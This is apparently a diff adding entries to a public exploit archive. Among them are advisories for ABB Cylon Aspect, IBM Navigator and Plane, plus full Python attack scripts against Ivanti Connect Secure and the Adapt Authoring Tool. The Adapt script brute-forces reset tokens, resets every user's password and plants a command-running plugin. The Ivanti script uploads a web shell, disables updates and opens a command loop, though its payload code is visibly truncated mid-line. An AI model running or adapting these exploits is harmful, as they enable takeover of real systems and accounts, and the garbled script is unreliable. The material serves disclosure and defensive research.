+--> + + + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + + +
+ + + + +
+ + + \ No newline at end of file diff --git a/exploits/multiple/hardware/52224.txt b/exploits/multiple/hardware/52224.txt new file mode 100644 index 000000000..6d44586be --- /dev/null +++ b/exploits/multiple/hardware/52224.txt @@ -0,0 +1,79 @@ +ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The application suffers from cleartext transmission and storage of +sensitive information in a Cookie. This includes the globals parameter, where +authdata contains base64-encoded credentials. A remote attacker can intercept +the HTTP Cookie, including authentication credentials, through a man-in-the-middle +attack, potentially compromising user accounts and sensitive data. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5895 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5895.php +CVE ID: CVE-2024-51546 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-51546 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +Cookie: PHPSESSID=xxx; context1=xxx; globals={"currentUser":{"username":"aamuser","authdata":"YWFtdXNlcjpkZWZhdWx0","mangledAuth":"bXVidmZnO2Vmc3Z0Ym45YjczMzY2ODo6MjQyODQ7Mg==","loginExpirySeconds":0},"loggedIn":true,"lang":"en"}; cod=5.27; connect.sid=xxx; csd=44 \ No newline at end of file diff --git a/exploits/multiple/remote/52213.py b/exploits/multiple/remote/52213.py new file mode 100755 index 000000000..6eb4ceff0 --- /dev/null +++ b/exploits/multiple/remote/52213.py @@ -0,0 +1,138 @@ +# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE) +# Date: 2025-01-11 +# Exploit Author: @absholi7ly +# CVE: CVE-2025-0282 + +import requests +import sys +import struct +import socket +import ssl +import urllib3 +import time + +# Disable SSL warnings +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008): + + payload = b"A" * offset # Fill the buffer + payload += struct.pack(" /shell.php" + exploit_vulnerability(target_ip, command) + print("[+] Web shell uploaded successfully at /shell.php.") + verify_shell(target_ip) + + except Exception as e: + print(f"[-] Error uploading web shell: {e}") + +def verify_shell(target_ip): + + shell_url = f"http://{target_ip}/shell.php" + try: + response = requests.get(shell_url, verify=False, timeout=10) + if response.status_code == 200: + print("[+] Web shell is accessible.") + else: + print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}") + except Exception as e: + print(f"[-] Error verifying web shell: {e}") + +def execute_shell_command(target_ip, command): + + shell_url = f"http://{target_ip}/shell.php" + try: + # Sending the command via POST + response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10) + if response.status_code == 200: + print(f"[+] Command output:\n{response.text.strip()}") + else: + print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}") + except Exception as e: + print(f"[-] Error executing command via web shell: {e}") + +def disable_updates(target_ip): + + commands = [ + "systemctl stop apt-daily.service", + "systemctl disable apt-daily.service" + ] + for command in commands: + execute_shell_command(target_ip, command) + print("[+] System updates disabled successfully.") + + +def main(): + + if len(sys.argv) != 3: + print("Usage: python3 cve_2025_0282.py ") + sys.exit(1) + + target_ip = sys.argv[1] + local_shell_path = sys.argv[2] + + # Upload the web shell + upload_web_shell(target_ip, local_shell_path) + + while True: + command = input("Enter command to execute on the target (or 'exit' to quit): ") + if command.lower() == "exit": + print("Exiting...") + break + + execute_shell_command(target_ip, command) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52208.py b/exploits/multiple/webapps/52208.py new file mode 100755 index 000000000..5afcdcba7 --- /dev/null +++ b/exploits/multiple/webapps/52208.py @@ -0,0 +1,293 @@ +# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE) +# Date: 2024-11-24 +# Exploit Author: Eui Chul Chung +# Vendor Homepage: https://www.adaptlearning.org/ +# Software Link: https://github.com/adaptlearning/adapt_authoring +# Version: 0.11.3 +# CVE Identifier: CVE-2024-50672 , CVE-2024-50671 + +import io +import sys +import json +import zipfile +import argparse +import requests +import textwrap + + +def get_session_cookie(username, password): + data = {"email": username, "password": password} + res = requests.post(f"{args.url}/api/login", data=data) + + if res.status_code == 200: + print(f"[+] Login as {username}") + return res.cookies.get_dict() + + return None + + +def get_users(): + session_cookie = get_session_cookie(args.username, args.password) + if session_cookie is None: + print("[-] Login failed") + sys.exit() + + res = requests.get(f"{args.url}/api/user", cookies=session_cookie) + users = [ + {"email": user["email"], "role": user["roles"][0]["name"]} + for user in json.loads(res.text) + ] + + roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3} + users.sort(key=lambda user: roles[user["role"]]) + for user in users: + print(f"[+] {user['email']} ({user['role']})") + + return users + + +def reset_password(users): + # Overwrite potentially expired password reset tokens + for user in users: + data = {"email": user["email"]} + requests.post(f"{args.url}/api/createtoken", data=data) + print("[+] Generate password reset token for every user") + + valid_characters = "0123456789abcdef" + next_tokens = ["^"] + + # Ensure that only a single result is returned at a time + while next_tokens: + prev_tokens = next_tokens + next_tokens = [] + + for token in prev_tokens: + for ch in valid_characters: + data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"} + res = requests.put( + f"{args.url}/api/userpasswordreset/w00tw00t", + json=data, + ) + + # Multiple results returned + if res.status_code == 500: + next_tokens.append(token + ch) + + print("[+] Reset every password to HaXX0r3d!") + + +def create_plugin(plugin_name): + manifest = { + "name": plugin_name, + "version": "1.0.0", + "extension": "exploit", + "main": "/js/main.js", + "displayName": "exploit", + "keywords": ["adapt-plugin", "adapt-extension"], + "scripts": {"adaptpostcopy": "/scripts/postcopy.js"}, + } + + property = { + "properties": { + "pluginLocations": { + "type": "object", + "properties": {"course": {"type": "object"}}, + } + } + } + + payload = textwrap.dedent( + f""" + const {{ exec }} = require("child_process"); + + module.exports = async function (fs, path, log, options, done) {{ + try {{ + exec("{args.command}"); + }} catch (err) {{ + log(err); + }} + done(); + }}; + """ + ).strip() + + plugin = io.BytesIO() + with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file: + zip_file.writestr( + f"{plugin_name}/bower.json", + io.BytesIO(json.dumps(manifest).encode()).getvalue(), + ) + zip_file.writestr( + f"{plugin_name}/properties.schema", + io.BytesIO(json.dumps(property).encode()).getvalue(), + ) + zip_file.writestr( + f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue() + ) + zip_file.writestr( + f"{plugin_name}/scripts/postcopy.js", + io.BytesIO(payload.encode()).getvalue(), + ) + + plugin.seek(0) + return plugin + + +def find_plugin(cookies, plugin_type, plugin_name): + res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies) + for plugin in json.loads(res.text): + if plugin["name"] == plugin_name: + return plugin["_id"] + + return None + + +def create_course(cookies): + data = {} + res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data) + course_id = json.loads(res.text)["_id"] + + data = {"_courseId": course_id, "_parentId": course_id} + res = requests.post( + f"{args.url}/api/content/contentobject", + cookies=cookies, + json=data, + ) + content_id = json.loads(res.text)["_id"] + + data = {"_courseId": course_id, "_parentId": content_id} + res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data) + article_id = json.loads(res.text)["_id"] + + data = {"_courseId": course_id, "_parentId": article_id} + res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data) + block_id = json.loads(res.text)["_id"] + + component_id = find_plugin(cookies, "component", "adapt-contrib-text") + + data = { + "_courseId": course_id, + "_parentId": block_id, + "_component": "text", + "_componentType": component_id, + } + requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data) + + return course_id + + +def rce(users): + session_cookie = None + for user in users: + if user["role"] == "Super Admin": + session_cookie = get_session_cookie(user["email"], "HaXX0r3d!") + break + + if session_cookie is None: + print("[-] Failed to login as Super Account") + sys.exit() + + plugin_name = "adapt-contrib-xapi" + print(f"[+] Create malicious plugin : {plugin_name}") + plugin = create_plugin(plugin_name) + + print("[+] Scan installed plugins") + plugin_id = find_plugin(session_cookie, "extension", plugin_name) + if plugin_id is None: + print(f"[+] {plugin_name} not found") + else: + print(f"[+] Found {plugin_name}") + print(f"[+] Remove {plugin_name}") + requests.delete( + f"{args.url}/api/extensiontype/{plugin_id}", + cookies=session_cookie, + ) + + print("[+] Upload plugin") + files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")} + requests.post( + f"{args.url}/api/upload/contentplugin", + cookies=session_cookie, + files=files, + ) + + print("[+] Find uploaded plugin") + plugin_id = find_plugin(session_cookie, "extension", plugin_name) + if plugin_id is None: + print(f"[-] {plugin_name} not found") + sys.exit() + print(f"[+] Plugin ID : {plugin_id}") + + print("[+] Add plugin to new courses") + data = {"_isAddedByDefault": True} + requests.put( + f"{args.url}/api/extensiontype/{plugin_id}", + cookies=session_cookie, + json=data, + ) + + print("[+] Create a new course") + course_id = create_course(session_cookie) + + print("[+] Build course") + res = requests.get( + f"{args.url}/api/output/adapt/preview/{course_id}", + cookies=session_cookie, + ) + + if res.status_code == 200: + print("[+] Command execution succeeded") + else: + print("[-] Command execution failed") + + print("[+] Remove course") + requests.delete( + f"{args.url}/api/content/course/{course_id}", + cookies=session_cookie, + ) + + +def main(): + print("[*] Retrieve user information") + users = get_users() + + print("\n[*] Reset password") + reset_password(users) + + print("\n[*] Perform remote code execution") + rce(users) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument( + "-u", + dest="url", + help="Site URL (e.g. www.adaptlearning.org)", + type=str, + required=True, + ) + parser.add_argument( + "-U", + dest="username", + help="Username to authenticate as", + type=str, + required=True, + ) + parser.add_argument( + "-P", + dest="password", + help="Password for the specified username", + type=str, + required=True, + ) + parser.add_argument( + "-c", + dest="command", + help="Command to execute (e.g. touch /tmp/pwned)", + type=str, + default="touch /tmp/pwned", + ) + args = parser.parse_args() + + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52210.txt b/exploits/multiple/webapps/52210.txt new file mode 100644 index 000000000..824202856 --- /dev/null +++ b/exploits/multiple/webapps/52210.txt @@ -0,0 +1,114 @@ +# Author Title: John Page (aka hyp3rlinx) +# Author Website: hyp3rlinx.altervista.org +# Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt + # Vendor: www.ibm.com + +[Product] +Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i. +IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application. +This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser. + +[Vulnerability Type] +HTTP Security Token Bypass + +[CVE Reference] +CVE-2024-51464 + +[Security Issue] +IBM i is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this +vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i. + +The web application generates an HTTP security token ID called "Mn:" with a 19 digit value and is set in the HTTP session response header per user. +Navigator, uses this token for integrity purpose to protect against arbitrary and or malicious HTTP requests. Therefore, upon receipt of a bogus +security token in an HTTP request the server will respond with HTTP 403 Forbidden message. + +However, attackers can modify existing tokens to bypass the 403 Forbidden directive to achieve their objectives. Problem is Navigator security token logic +does not properly create or detect if a security token is valid or if it has been tampered with. + +Attackers can manipulate the last eight digits of a token by setting them to all 0000s (zeroes) and or increment them by one, token length must be the same. +This can trick the application into processing attacker controlled security tokens as the server thinks it is valid, this undermines the security of this protection. + +E.g. Valid HTTP header generated by the server. + +Mn: 6844795211344371559 +Content-Length: 290 +Origin: https://10.1.1.4:2003 + +Example of a bogus but honored MN header token set by an attacker, padded with zeros and happily accepted by the backend servlet. +Mn: 6844795211300000000 + +The MN token is generated in the "initProtectionSetting" java method. + +public void initProtectionSetting(HttpServletRequest request, HttpServletResponse response) { + initEncryption(); + initSession(); + + [ REDACTED ] + + setMagicNumber(magicNumber); + response.setHeader("MN", magicNumber + ""); + setUserAgent(request.getHeader("User-Agent")); + } + + +In the (doFilter) Method we see the check for MN header which sends HTTP 403 on invalid tokens. + + String mnStr = hRequest.getHeader("MN"); + if (mnStr == null) + mnStr = hRequest.getParameter("MN"); + if (!isMnMatched(mnStr, hSession)) { + NavLogger.severe("Forbidden. Incorrect HTTP ID"); + NavLogger.info("Request URI: " + requestURI); + hResponse.sendError(403); + return; + + +Invalid token response will return: +Error 403: SRVE38895F: Error reported: 403 + + +Attacker increments MN or pad with zeros and requests are accepted and the token succeeds. +HTTP 200 OK + + +[References] +ADV0142855 +https://www.ibm.com/support/pages/node/7179509 + +IBM classified as "CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax". +To be clear HTTP headers are just the delivery method for sending attacker controlled tokens to bypass Navigator protection. + + +[Exploit/POC] +Intercept Navigator HTTP requests and increment the last one or two digits of the Mn: HTTP +header security token or just pad the last eight digits with all zeroes. + + +[Network Access] +Remote + + +[Severity] +Medium +CVSS Base score: 4.3 + +[Affected versions] +7.5.0,7.4.0, 7.3.0 + + +[Disclosure Timeline] +Vendor Notification: 10/14/2024 +Vendor fix and publication: 12/20/2024 +12/27/2024 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/multiple/webapps/52211.txt b/exploits/multiple/webapps/52211.txt new file mode 100644 index 000000000..dc0e870d4 --- /dev/null +++ b/exploits/multiple/webapps/52211.txt @@ -0,0 +1,30 @@ +# Exploit Title: Plane - Server side request forgery (SSRF) +# Date: 2024-01-13 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://plane.so +# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1 +# Version: v0.23.1 +# Tested: Windows 10 x64 + +Description: + +A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains. + +Steps to Reproduce: + +1- Go to the password recovery or login section where the email input is required. + +2- Inject the following payload in the email field, replacing the domain with a server you control: + +{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"} + +Send the request: + +POST /auth/magic-generate/ HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/json +Content-Length: 62 + +{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"} + +3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system. \ No newline at end of file diff --git a/exploits/multiple/webapps/52212.txt b/exploits/multiple/webapps/52212.txt new file mode 100644 index 000000000..bb9dcd69e --- /dev/null +++ b/exploits/multiple/webapps/52212.txt @@ -0,0 +1,91 @@ +# Author Title: John Page (aka hyp3rlinx) +# Author Website: hyp3rlinx.altervista.org +# Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt +# Vendor: www.ibm.com + + + +[Vendor] +www.ibm.com + +[Product] +Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i. +IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application. +This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser. + + +[Vulnerability Type] +Server Side Request Forgery (SSRF) + +[CVE Reference] +CVE-2024-51463 + +[Security Issue] +IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, +potentially leading to network enumeration or facilitating other attacks. + +post auth server side request forgery on non managed nodes to external hosts on any TCP ports. There are two call vectors that can be abused here, +one is the "Test TLS connection" but it only allows connections to TCP port 9476. + +However, there exists another servlet method called "testConnectPort" which an authenticated attacker can use to connect to any IP and PORT +outside of the LAN. This can be abused for port scans, information disclosure, exfil data., bypass firewall rules to attack non managed nodes +or connect to attacker controlled C2 infrastructure. + +This SSRF relies on exploiting a HTTP servlet generated security token bypass CVE-2024-51464, where intercepted HTTP request MN tokens are +incremented or padded with zero. This attacker controlled MN token is now seen as valid and the HTTP 403 Forbidden restriction is bypassed. + + +[Exploit/POC] +1) attacker payload + +POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4 +{"hostname":"10.2.10.16", "port":445} + +2) attackers c2 server + +┌──(rootggKali)-[/usr/share] +└─# nc -llvp 445 +listening on [any] 445 ... +connect to [10.2.10.16] from victimhost [10.1.1.4] 44569 + + +For port scan we can infer if external host ports are open or closed using error responses. + +Port is open: +Error 500: Connection reset + +Port is closed +Error 500: A remote host refused an attempted connect + + +[References] +ADV0142856 +https://www.ibm.com/support/pages/node/7179509 + +[Affected versions] +7.5.0,7.4.0, 7.3.0 + + +[Network Access] +Remote + + +[Severity] +Medium +CVSS Base score: 5.4 + +Vendor Notification: 10/14/2024 +Vendor fix and publication: 12/20/2024 +12/27/2024 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/multiple/webapps/52222.txt b/exploits/multiple/webapps/52222.txt new file mode 100644 index 000000000..3a4591f25 --- /dev/null +++ b/exploits/multiple/webapps/52222.txt @@ -0,0 +1,78 @@ +ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.03 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB BMS/BAS controller suffers from an authenticated reflected +cross-site scripting vulnerability. Input passed to the GET parameters 'name' +and 'id' is not properly sanitised before being returned to the user. This +can be exploited to execute arbitrary HTML/JS code in a user's browser session +in context of an affected site. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5897 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5897.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +http://192.168.73.31:7226/servlets/MapServices?cmd=&id=251 +http://192.168.73.31:7226/servlets/MapServices?cmd=readScheduleConfig&id= \ No newline at end of file diff --git a/exploits/multiple/webapps/52223.txt b/exploits/multiple/webapps/52223.txt new file mode 100644 index 000000000..caa2a5590 --- /dev/null +++ b/exploits/multiple/webapps/52223.txt @@ -0,0 +1,90 @@ +ABB Cylon Aspect 3.08.03 Hard-coded Secrets + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.03 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB Cylon Aspect BMS/BAS controller contains multiple instances +of hard-coded credentials, including usernames, passwords, and encryption +keys embedded in various java classes. This practice poses significant security +risks, allowing attackers to gain unauthorized access and compromise the +system's integrity. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5896 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5896.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 